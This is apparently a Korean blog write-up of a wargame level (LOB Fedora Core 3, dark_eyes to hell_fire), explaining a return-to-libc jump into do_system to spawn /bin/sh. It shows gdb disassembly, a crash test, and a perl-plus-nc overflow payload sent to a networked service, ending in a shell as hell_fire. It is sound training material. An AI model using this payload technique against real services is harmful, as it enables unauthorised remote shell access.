Wargame/LOB_FC

[LOB_FC3] dark_eyes ->hell_fire

bbolmin 2014. 7. 12. 12:21



#Env 


- NX

- ascii armor

- random stack


#Technic


- do_system RTL



hell_fire.c 소스



[dark_eyes@Fedora_1stFloor ~]$ cat /etc/xinetd.d/hell_fire

service hell_fire

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = hell_fire

        server          = /home/dark_eyes/hell_fire

}



1. xineted로 데몬이 구동되고 있어서 자동으로 표준입출력인 연결된다.

2. system함수를 사용할 때 local환경에서는 disable_priv_mode() 함수에 의해 euid를 현재 사용자의 uid로 변경하지만 remote 환경에서는그대로 권한을 받아온다.








exploit은 execve("/bin/sh", 0, 0)을 실행하는 곳으로 RTL하는 것이다.


system -> do_system -> "/bin/sh"를 실행하는 execve 주소



(gdb) disass system

Dump of assembler code for function system:

0x007507c0 <system+0>:  push   %ebp

0x007507c1 <system+1>:  mov    %esp,%ebp

0x007507c3 <system+3>:  sub    $0xc,%esp

....

0x007507fe <system+62>: jmp    0x750320 <do_system>

0x00750803 <system+67>: lea    0xffff4617(%ebx),%eax

0x00750809 <system+73>: call   0x750320 <do_system>



(gdb) disass do_system
Dump of assembler code for function do_system:
0x00750320 <do_system+0>:       push   %ebp
0x00750321 <do_system+1>:       mov    $0x1,%edx
.....
0x00750775 <do_system+1109>:    mov    %esi,0x4(%esp)
0x00750779 <do_system+1113>:    lea    0xfffffec4(%ebp),%esi
0x0075077f <do_system+1119>:    call   0x743d30 <sigprocmask>
0x00750784 <do_system+1124>:    mov    0xfffffec4(%ebx),%ecx <- jump
0x0075078a <do_system+1130>:    xor    %edx,%edx
0x0075078c <do_system+1132>:    xor    %eax,%eax
0x0075078e <do_system+1134>:    mov    %edx,0x16bc(%ebx)
0x00750794 <do_system+1140>:    lea    0xffff460f(%ebx),%edx
0x0075079a <do_system+1146>:    mov    (%ecx),%edi
0x0075079c <do_system+1148>:    mov    %eax,0x16b8(%ebx)
0x007507a2 <do_system+1154>:    mov    %esi,0x4(%esp)
0x007507a6 <do_system+1158>:    mov    %edi,0x8(%esp)
0x007507aa <do_system+1162>:    mov    %edx,(%esp)
0x007507ad <do_system+1165>:    call   0x7a5490 <execve>




[000a6161] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,3454,48,0): No such process

[????????] +++ killed by SIGSEGV +++


[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x270, "\n"';cat)|strace -i ./hell_fire




payload : | 268 dummy | &<do_system+1124> | 


[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x268, "\x84\x07\x75\x00"';cat)| nc 192.168.11.137 7777

hell_fire : What's this smell?

you :


id

uid=503(hell_fire) gid=503(hell_fire) context=user_u:system_r:unconfined_t

my-pass

euid = 503

sign me up